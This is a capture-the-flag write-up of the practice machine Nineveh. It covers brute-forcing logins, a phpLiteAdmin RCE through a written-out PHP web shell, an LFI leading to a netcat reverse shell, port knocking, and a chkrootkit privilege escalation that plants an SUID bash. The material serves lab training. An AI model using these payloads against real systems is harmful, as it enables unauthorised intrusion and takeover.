# NINEVEH | 10.10.10.43

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.43
    
### Open Ports and Their Services

* 80 - HTTP - Apache 2.4.18 Ubuntu
* 443 - HTTPS - Apache 2.4.18 Ubuntu

## Services Enumeration

### 80 - HTTP

The page is a default and no use to us:

![](img/port-80.png)

A dir query pulls up a `/department` directory that redirects to a login page:

![](img/department.png)

![](img/department-login.png)

In the source code of that page is a note about MySQL which is a big clue:

![](img/mysql.png)

It does not necessarily mean there is an SQL injection vuln, but it's good to keep in mind.

From some testing, it does allow username enumeration, so 'admin' is a valid username.

After messing around a bit and finding no clues for a password, nor any open directories with credentials, I had to turn to a friggin brute force attack, and hope that since this box is an older one that the password is in the rockyou list.

It is:

![](img/password.png)

Inside the portal is a simple page with a notes functionality and some clues:

![](img/manage.png)

Also it looks like the page could allow for an LFI vuln, but a I tried a few options and I could not pull any files up.

### 443 - HTTPS

The main ssl page has an image only:

![](img/image.png)

There is a directory that I found, however, which goes to another login page, asking for a password:

![](img/phpliteadmin.png)

This one is a bit tricky for bruteforcing at first because hydra kept asking to include a login name but there was only a password form. I was about to give up on trying hydra here (and to be honest doing a brute is boring) until I decided to just supply `-l admin` and then I got a hit:

![](img/password2.png)

Logging in to the panel, we have some options. The version of phpliteadmin is 1.9, which may be vulnerable to an RCE via php:

![](img/searchsploit-phpliteadmin.png)

This exploit requires me to create a new database, and then create a table in the database with a simple oneliner php cmd executer (<?php echo system($_REQUEST["cmd"]); ?>). Apparently the database must be named the same as the 'ninevehNotes.txt' on the notes page, except with the extension .php - if you name it anything else this exploit will not work. Could mean there is some kind of filtering in place.

**Step One**

![](img/create.png)

**Step Two**

![](img/table.png)

**Step Three**

![](img/field.png)

Then, note the path of the db you just created:

![](img/db-path.png)

Let's return to the notes page on port 80 and append some command to test injection:

![](img/cmd.png)

And we have successful command injection here:

![](img/RCE.png)

## Foothold

Now, I need to create a command for a reverse shell connection. First, I spin up a netcat listener on my end, waiting to receive the connection:

    nc -nvvlp 6969
    
And then I need to use the right kind of reverse connection - some of them fail to work, but I found the netcat OpenBSD type to work. I had to URL encode it so it could be properly parsed.

![](img/www-data-shell.png)

But there it is, a rickety shell. But the user flag is currently out of reach. So let's enumerate.

## User Enumeration

While poking around in my user's directories, I found a 'secure_notes' dir that my directory busting did not find:

![](img/secure-notes.png)

In the browser, it is just another image, and that is also all that is inside the directory:

![](img/sec-note.png)

I sure hope this isn't some kind of steg thing. I only have steghide, which doesn't support png files. I should at least run `strings` on it:

![](img/ssh-key.png)

There's an SSH key in it. Neat. But, there is no SSH server running on this machine. But let's check netstat on the machine just in case:

![](img/22-open.png)

Well I'll be damned. There must be a firewall that blocks the port externally. I think this means I can try to connect internally?

![](img/user-shell.png)

OK, now I am an actual user, and I can read the flag:

![](img/user-flag.png)

Let's continue with enumeration.

### Linpeas findings

* potential PATH vuln:

![](img/path-vuln.png)

* knockd running (port knocking):

![](img/knockd.png)

* potential CRON/PATH abuse:

![](img/crontab.png)

![](img/report.png)

OK, so we really should check out that report-reset script I guess.

But first, I should check out the knockd config, maybe that opens the SSH port to the world:

![](img/knockd-config.png)

It does. I guess I just used a dirty way to privesc to this user. Currently, if I lose this shell, I'll have to run the PHP exploit all over again.

### Port Knocking

Never done it before, but I am familiar with the concept; I need to scan those specific ports in that order, in order for the system to open port 22.

    for x in 571 290 911; do nmap -v -Pn --max-retries=0 -p $x; done
    
And now the port is open:

![](img/ssh-open.png)

And I have a better, more secure connection:

![](img/connection.png)

Anyway, back to the main event, which is that script.

### 'REPORT-RESET' script

This script is owned by me, and run every 10 minutes, according to the crontab. The contents are a simple deletion of text files in the `/report` directory. Taking a quick look at those reports, I see it is a log of some kind of rootkit/security scanner, and there is even a positive result:

![](img/report-txt.png)

Hopefully it is a false positive!

I ran pspy to see what else was going on and yes, 'chkrootkit' is running, along with 'vulnScan':

![](img/rootkit.png)

This report-reset script runs as my user, and the path is explicit in the crontab, which means that I can't exploit it. But why is it there? It pointed me towards the chkrootkit script, which runs more frequently than the report script. And unlike the report script, chkrootkit is run by root.

### CHKROOTKIT

Since the signs are pointing to chkrootkit, I do a searchsploit query:

![](img/chkrootkit-searchsploit.png)

And there is a dead-simple to exploit vulnerability in this application. When it runs, because of an unquoted variable it will run any executable named 'update' located in the /tmp dir.

## Privilege Escalation

I echoed a simple oneliner to copy bash into /tmp, then make it SUID, that way when chkrootkit runs (as root), it will execute the command (as root), which will give me a root bash located in /tmp.

    echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /tmp/update
    
Then I wait for chkrootkit to run and there is an SUID bash waiting for me:

![](img/bash.png)

Once executed (`/tmp/bash -p`), I am root.

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

This was a convoluted box, and it took me a while, because I kept jumping at the first opportunities that I came upon. But I like that there were many steps, and that the box had some limited countermeasures; for example, for the PHP execution, I did end up confirming that the malicious php had to be named the same as the notes, because there was filtering in place. There was also filtering for the length of the filename but I didn't run into that issue.

I also liked how the enumeration at first made it appear that my privesc was going to be via a CRON/PATH abuse exploit, but upon closer inspection that was not the case. Yes I could put a malicious script in the user's PATH, even though the crontab had an explicit path that I could edit, but the script was not running as root, so there was no way up in that case. What that cron did though was point me to the chkrootkit vuln, which was pretty neat.

Steps taken:

* Brute force credentials to website logins
* Inject malicious PHP command exec into new database
* use LFI vuln to execute reverse shell command
* Abuse unquoted variable in a binary running as root in a cron
